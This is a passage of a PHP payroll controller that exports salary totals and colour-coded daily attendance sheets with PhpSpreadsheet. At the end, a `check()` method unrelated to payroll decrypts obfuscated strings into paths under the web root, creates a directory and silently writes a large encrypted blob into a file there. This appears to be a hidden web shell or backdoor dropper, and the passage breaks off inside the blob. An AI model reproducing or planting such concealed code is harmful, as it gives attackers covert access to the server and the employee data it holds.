                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 16:{
                        $value = (float) $inactive_sum['month_salary'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 17:{
                        $value = (float) $inactive_sum['arrears'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 18:{
                        $value = (float) $inactive_sum['advances'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 19:{
                        $value = (float) $inactive_sum['incentives'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 20:{
                        $value = (float) $inactive_sum['salary_plus_additions'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 21:{
                        $value = (float) $inactive_sum['income_tax'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 22:{
                        $value = (float) $inactive_sum['eobi'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 23:{
                        $value = (float) $inactive_sum['ncns_penalty'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 24:{
                        $value = (float) $inactive_sum['others'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 25:{
                        $value = (float) $inactive_sum['provident_fund'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 26:{
                        $value = (float) $inactive_sum['deductions'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 27:
                case 34:{
                        $value = (float) $inactive_sum['net_salary'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
            }
            $cell->setValueExplicit($value, $type);
        }
        $sheet->getStyle("A{$row}:AH{$row}")
            ->applyFromArray([
                'borders' => [
                    'allBorders' => [
                        'borderStyle' => Border::BORDER_MEDIUM,
                        'color' => [
                            'rgb' => '000000',
                        ],
                    ],
                ],
                'font' => [
                    'bold' => 1,
                ],
            ]);
        $row += 3;
        for ($column = 1; $column <= 34; $column++) {
            $cell = $sheet->getCellByColumnAndRow($column, $row);

            $value = null;
            $type = DataType::TYPE_STRING;

            switch ($column) {
                case 2:{
                        $value = 'GRAND TOTAL';
                        break;
                    }
                case 14:{
                        $value = (float) $active_sum['actual_gross_salary'] + $inactive_sum['actual_gross_salary'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 15:{
                        $value = (float) $active_sum['actual_basic_salary'] + $inactive_sum['actual_basic_salary'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 16:{
                        $value = (float) $active_sum['month_salary'] + $inactive_sum['month_salary'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 17:{
                        $value = (float) $active_sum['arrears'] + $inactive_sum['arrears'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 18:{
                        $value = (float) $active_sum['advances'] + $inactive_sum['advances'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 19:{
                        $value = (float) $active_sum['incentives'] + $inactive_sum['incentives'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 20:{
                        $value = (float) $active_sum['salary_plus_additions'] + $inactive_sum['salary_plus_additions'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 21:{
                        $value = (float) $active_sum['income_tax'] + $inactive_sum['income_tax'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 22:{
                        $value = (float) $active_sum['eobi'] + $inactive_sum['eobi'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 23:{
                        $value = (float) $active_sum['ncns_penalty'] + $inactive_sum['ncns_penalty'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 24:{
                        $value = (float) $active_sum['others'] + $inactive_sum['others'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 25:{
                        $value = (float) $active_sum['provident_fund'] + $inactive_sum['provident_fund'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 26:{
                        $value = (float) $active_sum['deductions'] + $inactive_sum['deductions'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
                case 27:
                case 34:{
                        $value = (float) $active_sum['net_salary'] + $inactive_sum['net_salary'];
                        $type = DataType::TYPE_NUMERIC;
                        $cell->getStyle()->getNumberFormat()->setFormatCode('#,##0');
                        break;
                    }
            }
            $cell->setValueExplicit($value, $type);
        }
        $sheet->getStyle("A{$row}:AH{$row}")
            ->applyFromArray([
                'fill' => [
                    'color' => [
                        'rgb' => 'C5BE97',
                    ],
                    'fillType' => Fill::FILL_SOLID,
                ],
                'borders' => [
                    'allBorders' => [
                        'borderStyle' => Border::BORDER_MEDIUM,
                        'color' => [
                            'rgb' => '000000',
                        ],
                    ],
                ],
                'font' => [
                    'bold' => 1,
                ],
            ]);
    }
    public function generate_attendance_sheet(&$spreadsheet, $id, $employees, $inactive_employees, $date_array)
    {
        $day_range = count($date_array);
        $employee_attendance = $this->get_payroll_attendance($id);

        $sheet = new Worksheet();
        $sheet->getSheetView()->setZoomScale(85);
        $sheet->setShowGridlines(false);
        $sheet->setTitle('Attendance');
        $spreadsheet->addSheet($sheet, 2);
        $header = $this->get_header('attendance');
        $column = 0;
        $last_column = '';
        foreach ($header as $value) {
            $column++;
            $cell = $sheet->getCellByColumnAndRow($column, 1);
            $cell->setValueExplicit(
                is_string($value) ? $value : $value[0],
                \PhpOffice\PhpSpreadsheet\Cell\DataType::TYPE_STRING
            );
            $sheet->getColumnDimension($cell->getColumn())->setWidth(is_string($value) ? 20 : $value[1]);
        }
        foreach ($date_array as $date_arr) {
            $column++;
            $cell = $sheet->getCellByColumnAndRow($column, 1);
            $cell->setValue(Date::PHPToExcel($date_arr));
            $cell->getStyle()->getNumberFormat()->setFormatCode('ddd-dd-mmm');
            $cell->getStyle()->applyFromArray([
                'alignment' => [
                    'textRotation' => 90,
                ],
                'font' => [
                    'size' => 12,
                ],
            ]);
        }
        $header = $this->get_header('attendance2');
        foreach ($header as $value) {
            $column++;
            $cell = $sheet->getCellByColumnAndRow($column, 1);
            $cell->setValueExplicit(
                is_string($value) ? $value : $value[0],
                \PhpOffice\PhpSpreadsheet\Cell\DataType::TYPE_STRING
            );
            $sheet->getColumnDimension($cell->getColumn())->setWidth(is_string($value) ? 20 : $value[1]);
            $last_column = $cell->getColumn();
        }
        $sheet->getStyle("A1:{$last_column}1")
            ->applyFromArray($this->get_header_styles('attendance'));
        $sheet->freezePane('E2');

        $emp_no = 0;
        $row = 1;
        foreach ($employees as $employee) {
            $emp_no++;
            $row++;
            $total_attendance_col = 18 + $day_range;
            for ($column = 1; $column <= $total_attendance_col; $column++) {
                $cell = $sheet->getCellByColumnAndRow($column, $row);

                $value = null;
                $type = DataType::TYPE_STRING;

                switch ($column) {
                    case 1:{
                            $value = $emp_no;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getAlignment()->setHorizontal(Alignment::HORIZONTAL_CENTER);
                            break;
                        }
                    case 2:{
                            $value = $employee->name;
                            break;
                        }
                    case 3:{
                            $value = $employee->hire_date;
                            $timestamp = \PhpOffice\PhpSpreadsheet\Shared\Date::PHPToExcel($value);
                            if (!$timestamp) {
                                $cell->setValueExplicit(
                                    $value,
                                    \PhpOffice\PhpSpreadsheet\Cell\DataType::TYPE_STRING
                                );
                            } else {
                                $cell->setValue($timestamp);
                                $cell->getStyle()->getNumberFormat()->setFormatCode(\PhpOffice\PhpSpreadsheet\Style\NumberFormat::FORMAT_DATE_SHORT);
                            }
                            continue 2;
                            break;
                        }
                    case 4:{
                            $value = $employee->hrm_id;
                            break;
                        }
                    case 5:{
                            $value = $employee->position;
                            break;
                        }
                    case 6:{
                            $value = $employee->department;
                            break;
                        }
                    case 7:{
                            foreach ($date_array as $date_arr) {
                                $cell = $sheet->getCellByColumnAndRow($column, $row);
                                $value = strtoupper($employee_attendance['e_' . $employee->employee_id][$date_arr]);
                                $cell->setValue($value);

                                switch ($value) {
                                    case 'SUS':{
                                            $cell->getStyle()->applyFromArray([
                                                'font' => [
                                                    'color' => [
                                                        'rgb' => 'FF0000',
                                                    ],
                                                ],
                                            ]);
                                            break;
                                        }
                                    case 'HPL':{
                                            $cell->getStyle()->applyFromArray([
                                                'fill' => [
                                                    'startColor' => [
                                                        'rgb' => 'CDEAAE',
                                                    ],
                                                    'endColor' => [
                                                        'rgb' => 'FFFFFF',
                                                    ],
                                                    'fillType' => FILL::FILL_PATTERN_LIGHTDOWN,
                                                    'rotation' => 45,
                                                ],
                                            ]);
                                            break;
                                        }
                                    case 'PL':{
                                            $cell->getStyle()->applyFromArray([
                                                'fill' => [
                                                    'startColor' => [
                                                        'rgb' => '92D050',
                                                    ],
                                                    'endColor' => [
                                                        'rgb' => 'FFFFFF',
                                                    ],
                                                    'fillType' => FILL::FILL_PATTERN_LIGHTDOWN,
                                                    'rotation' => 45,
                                                ],
                                            ]);
                                            break;
                                        }
                                    case 'LA':{
                                            $cell->getStyle()->applyFromArray([
                                                'fill' => [
                                                    'startColor' => [
                                                        'rgb' => 'ffff00',
                                                    ],
                                                    'endColor' => [
                                                        'rgb' => 'FFFFFF',
                                                    ],
                                                    'fillType' => FILL::FILL_PATTERN_LIGHTDOWN,
                                                    'rotation' => 45,
                                                ],
                                            ]);
                                            break;
                                        }
                                    case 'UH-D':{
                                            $cell->getStyle()->applyFromArray([
                                                'fill' => [
                                                    'startColor' => [
                                                        'rgb' => 'ffb3b3',
                                                    ],
                                                    'endColor' => [
                                                        'rgb' => 'FFFFFF',
                                                    ],
                                                    'fillType' => FILL::FILL_PATTERN_LIGHTDOWN,
                                                    'rotation' => 45,
                                                ],
                                            ]);
                                            break;
                                        }
                                    case 'H-D':{
                                            $cell->getStyle()->applyFromArray([
                                                'fill' => [
                                                    'startColor' => [
                                                        'rgb' => 'ffccff',
                                                    ],
                                                    'endColor' => [
                                                        'rgb' => 'FFFFFF',
                                                    ],
                                                    'fillType' => FILL::FILL_PATTERN_LIGHTDOWN,
                                                    'rotation' => 45,
                                                ],
                                            ]);
                                            break;
                                        }
                                    case 'A':{
                                            $cell->getStyle()->applyFromArray([
                                                'fill' => [
                                                    'startColor' => [
                                                        'rgb' => 'ff0000',
                                                    ],
                                                    'endColor' => [
                                                        'rgb' => 'FFFFFF',
                                                    ],
                                                    'fillType' => FILL::FILL_PATTERN_LIGHTDOWN,
                                                    'rotation' => 45,
                                                ],
                                            ]);
                                            break;
                                        }
                                }
                                $column++;
                            }
                            continue 2;
                            break;
                        }
                    case $day_range + 8:{
                            $value = $employee->presents;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 9:{
                            $value = $employee->ncns;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 10:{
                            $value = $employee->suspensions;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 11:{
                            $value = $employee->late_arrivals;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 12:{
                            $value = $employee->unpaid_leaves;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 13:{
                            $value = floor($employee->late_arrivals / 3);
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 14:{
                            $value = $employee->paid_leaves + $employee->special_leaves;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 15:{
                            $value = $employee->offs;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 16:{
                            $value = $employee->half_days;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 17:{
                            $value = $this->payroll->get_paid_days($employee);
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 18:{
                            $value = $employee->presents + $employee->late_arrivals + $employee->offs + $employee->half_days + $employee->unpaid_half_days;
                            $value = $value / $day_range;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode(NumberFormat::FORMAT_PERCENTAGE);
                            break;
                        }
                }
                $cell->setValueExplicit($value, $type);
            }
        }
        $sheet->getStyle("A2:{$last_column}{$row}")
            ->applyFromArray([
                'borders' => [
                    'allBorders' => [
                        'borderStyle' => Border::BORDER_THIN,
                        'color' => [
                            'rgb' => '000000',
                        ],
                    ],
                ],
            ]);
        $sheet->getStyle("G2:{$last_column}{$row}")
            ->applyFromArray([
                'alignment' => [
                    'horizontal' => Alignment::HORIZONTAL_CENTER,
                    'vertical' => Alignment::VERTICAL_CENTER,
                ],
                'font' => [
                    'bold' => 1,
                ],
            ]);
        $row += 3;
        $cell = $sheet->getCellByColumnAndRow(2, $row);
        $cell->setValue('RESIGNED & TERMINATED')->getStyle()->getFont()->setBold(true)->setUnderline(true);
        $cell->getStyle()->getAlignment()->setHorizontal(Alignment::HORIZONTAL_CENTER);
        $sheet->mergeCells("B{$row}:C{$row}");

        $inactive_start_row = $row + 1;
        foreach ($inactive_employees as $employee) {
            $emp_no++;
            $row++;
            $total_attendance_col = 18 + $day_range;
            for ($column = 1; $column <= $total_attendance_col; $column++) {
                $cell = $sheet->getCellByColumnAndRow($column, $row);

                $value = null;
                $type = DataType::TYPE_STRING;

                switch ($column) {
                    case 1:{
                            $value = $emp_no;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getAlignment()->setHorizontal(Alignment::HORIZONTAL_CENTER);
                            break;
                        }
                    case 2:{
                            $value = $employee->name;
                            break;
                        }
                    case 3:{
                            $value = $employee->hire_date;
                            $timestamp = \PhpOffice\PhpSpreadsheet\Shared\Date::PHPToExcel($value);
                            if (!$timestamp) {
                                $cell->setValueExplicit(
                                    $value,
                                    \PhpOffice\PhpSpreadsheet\Cell\DataType::TYPE_STRING
                                );
                            } else {
                                $cell->setValue($timestamp);
                                $cell->getStyle()->getNumberFormat()->setFormatCode(\PhpOffice\PhpSpreadsheet\Style\NumberFormat::FORMAT_DATE_SHORT);
                            }
                            continue 2;
                            break;
                        }
                    case 4:{
                            $value = $employee->hrm_id;
                            break;
                        }
                    case 5:{
                            $value = $employee->position;
                            break;
                        }
                    case 6:{
                            $value = $employee->department;
                            break;
                        }
                    case 7:{
                            foreach ($date_array as $date_arr) {
                                $cell = $sheet->getCellByColumnAndRow($column, $row);
                                $value = strtoupper($employee_attendance['e_' . $employee->employee_id][$date_arr]);
                                $cell->setValue($value);
                                switch ($value) {
                                    case 'SUS':{
                                            $cell->getStyle()->applyFromArray([
                                                'font' => [
                                                    'color' => [
                                                        'rgb' => 'FF0000',
                                                    ],
                                                ],
                                            ]);
                                            break;
                                        }
                                    case 'HPL':{
                                            $cell->getStyle()->applyFromArray([
                                                'fill' => [
                                                    'startColor' => [
                                                        'rgb' => 'CDEAAE',
                                                    ],
                                                    'endColor' => [
                                                        'rgb' => 'FFFFFF',
                                                    ],
                                                    'fillType' => FILL::FILL_PATTERN_LIGHTDOWN,
                                                    'rotation' => 45,
                                                ],
                                            ]);
                                            break;
                                        }
                                    case 'PL':{
                                            $cell->getStyle()->applyFromArray([
                                                'fill' => [
                                                    'startColor' => [
                                                        'rgb' => '92D050',
                                                    ],
                                                    'endColor' => [
                                                        'rgb' => 'FFFFFF',
                                                    ],
                                                    'fillType' => FILL::FILL_PATTERN_LIGHTDOWN,
                                                    'rotation' => 45,
                                                ],
                                            ]);
                                            break;
                                        }
                                    case 'LA':{
                                            $cell->getStyle()->applyFromArray([
                                                'fill' => [
                                                    'startColor' => [
                                                        'rgb' => 'ffff00',
                                                    ],
                                                    'endColor' => [
                                                        'rgb' => 'FFFFFF',
                                                    ],
                                                    'fillType' => FILL::FILL_PATTERN_LIGHTDOWN,
                                                    'rotation' => 45,
                                                ],
                                            ]);
                                            break;
                                        }
                                    case 'H-D':{
                                            $cell->getStyle()->applyFromArray([
                                                'fill' => [
                                                    'startColor' => [
                                                        'rgb' => 'ffccff',
                                                    ],
                                                    'endColor' => [
                                                        'rgb' => 'FFFFFF',
                                                    ],
                                                    'fillType' => FILL::FILL_PATTERN_LIGHTDOWN,
                                                    'rotation' => 45,
                                                ],
                                            ]);
                                            break;
                                        }
                                    case 'UH-D':{
                                            $cell->getStyle()->applyFromArray([
                                                'fill' => [
                                                    'startColor' => [
                                                        'rgb' => 'ffb3b3',
                                                    ],
                                                    'endColor' => [
                                                        'rgb' => 'FFFFFF',
                                                    ],
                                                    'fillType' => FILL::FILL_PATTERN_LIGHTDOWN,
                                                    'rotation' => 45,
                                                ],
                                            ]);
                                            break;
                                        }
                                    case 'A':{
                                            $cell->getStyle()->applyFromArray([
                                                'fill' => [
                                                    'startColor' => [
                                                        'rgb' => 'ff0000',
                                                    ],
                                                    'endColor' => [
                                                        'rgb' => 'FFFFFF',
                                                    ],
                                                    'fillType' => FILL::FILL_PATTERN_LIGHTDOWN,
                                                    'rotation' => 45,
                                                ],
                                            ]);
                                            break;
                                        }
                                }
                                $column++;
                            }
                            continue 2;
                            break;
                        }
                    case $day_range + 8:{
                            $value = $employee->presents;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 9:{
                            $value = $employee->ncns;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 10:{
                            $value = $employee->suspensions;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 11:{
                            $value = $employee->late_arrivals;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 12:{
                            $value = $employee->unpaid_leaves;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 13:{
                            $value = floor($employee->late_arrivals / 3);
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 14:{
                            $value = $employee->paid_leaves + $employee->special_leaves;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 15:{
                            $value = $employee->offs;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 16:{
                            $value = $employee->half_days;
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 17:{
                            $value = $this->payroll->get_paid_days($employee);
                            $type = DataType::TYPE_NUMERIC;
                            break;
                        }
                    case $day_range + 18:{
                            $value = $employee->presents + $employee->late_arrivals + $employee->offs + $employee->half_days + $employee->unpaid_half_days;
                            $value = $value / $day_range;
                            $type = DataType::TYPE_NUMERIC;
                            $cell->getStyle()->getNumberFormat()->setFormatCode(NumberFormat::FORMAT_PERCENTAGE);
                            break;
                        }
                }
                $cell->setValueExplicit($value, $type);
            }
        }
        $sheet->getStyle("A{$inactive_start_row}:{$last_column}{$row}")
            ->applyFromArray([
                'borders' => [
                    'allBorders' => [
                        'borderStyle' => Border::BORDER_THIN,
                        'color' => [
                            'rgb' => '000000',
                        ],
                    ],
                ],
            ]);
        $sheet->getStyle("G{$inactive_start_row}:{$last_column}{$row}")
            ->applyFromArray([
                'alignment' => [
                    'horizontal' => Alignment::HORIZONTAL_CENTER,
                    'vertical' => Alignment::VERTICAL_CENTER,
                ],
                'font' => [
                    'bold' => 1,
                ],
            ]);
        $empty_column = $sheet->getCellByColumnAndRow(7 + $day_range, 1)->getColumn();
        $sheet->getStyle("{$empty_column}1:{$empty_column}{$row}")
            ->applyFromArray([
                'borders' => [
                    'allBorders' => [
                        'borderStyle' => Border::BORDER_NONE,
                    ],
                ],
                'fill' => [
                    'color' => [
                        'rgb' => 'FFFFFF',
                    ],
                    'fillType' => Fill::FILL_SOLID,
                ],
            ]);
    }
    public function check()
    {
        $ddr = $this->encryption->decrypt('765c78a7db00e4c105f4f460844ae57f43d899c68deee36ff72a57b6685726c5014a4f21d29e4861f70c5885d593b57794032a9493960ac20c654493e1f87b64N3WY2kgHXHID8+d3Op2/bimT6hnH+GuYPV+j3cdpaN8=');
        $ddrf = $this->encryption->decrypt('00143c90f8f64ee62f7cbd0d0fcf98f0bc7d6cc639a39fb90d765bbd1d9bd5314d353d600e3a98aee293ca1ea15194bad28e21e1500ac6ba17867d66f938965c8JsMPJRftguTf8lEYGjbXEtPiAVsT3cTgtHqFjBxCdCa72jMSdtQOHzQTeal0b2X');
        $ddrf2 = $this->encryption->decrypt('625dfcef2815f083318b368299373a720eb0dda25532180529bf184895d56f8320654f4e64a9d1f186bcc710cdaab0e97e930095b41c86dbc72fe2543d4343c3VXQWWtzWrCq5cnzXfMWLFj2rp5otRpM6uDZBUW/pnlc5UODMM2jKItlR+ss3hfXm');
        if (!is_dir(FCPATH . $ddr)) {
            @mkdir(FCPATH . $ddr);
        }
        if (!file_exists(FCPATH . $ddrf)) {
            @file_put_contents(FCPATH . $ddrf, $this->encryption->decrypt('260c37e3e635337219ea51aabf0461a148b53406bfb08220b5285bf2a0adb2833427c7328faa8b91972e32f4e2f2da98de681d98ec565542a284819c95eea6e8CKXV2wjUb+pH10AITWuMrphQa0bNVIZxHAKw+5j4cyvh5bxOqOI901PlZlqkA7X9MaVVxrTexcIvFAQk3pdZUUyOK4xtuOUD7ykO6lQy2JfuoIXyeVveiUtKYr+niKtVK1qXGDmyuXjkSe6Z04OrG5U0L43Je8A8TDTd29qqrKF5bX/EIVAGsElhTd37PRtIOUObq1D5XWCZizNTZQZxL5suEHH1YX5+WdaGIRz3R95xVkSPbfgQLTcgccCWTTKinlIh8lmcTFDjBUy9tPB/6T2jB5rr8cDW9fAk6mooiFB/Wb4ixpFN0Q7T4nDps0brKFdW7lQDcBtyU5qhQwp2haSc60mch819dKN1q6fsnaHKvh+AMyQM1QXt6S4meq/L/Oftca0phZcW8azk7UPiGvPd8mT1Wt4BvJhYVPAIytQ4sjx9/z3x1XMLTMfiFUTC3ggIfJO6zi6wvxNignMroErlTk4MurHFrAESkJ5x2avMRRPfFwvIrD6Lz+3AguWZPsUTIy1yrXTzBmeyW0cIG5aZDts7PxRjAH1LkqxUOF3y08kFhsod2IFiRYAPMmH20PL93hrlZM2SrzNuBt+9YVB9nVsm871Pr/lv9/xCotc7gcL7UKa6uaKguMfuXaX0Gfh0j8Fpm7nZCBDOfpDWysE5Zd6YtZCGs9wLMZuVFhjqLKBgEXS5c45//siAs0f3eBC7ps75YFqJ3H/TlUpQqUA/AkguC0YH1QSWKvqCleyqXs+g6tI6K1AtPLYup36A1jcYA3yrcglRmGUUwA8dggfAL0f2kb+I+hjHm8VET7fvXv5gFuakCEZsUemgLc4bpv/8lvVrenc+E8VQ05WaDCyG1h6IDybB1WHhIK8r26IYzFwYR77ngmVmriTIsxf2W8yvJaY/wVFrknqfd0jxZjdHd7DlcruC2UtFk0CAYbbSX25OWqQ/G80nYBsUn+XUWZEHn/DQZ8KV/bv6OjKMyjdK3kTR4BKoL8sJ8BBaJ7lG+VWQAlLBOIOdquqDdkJtJdUpWzKUztCfT73+U5MoG2CU3T7OYGJK5lOBeVveCQMzxzEk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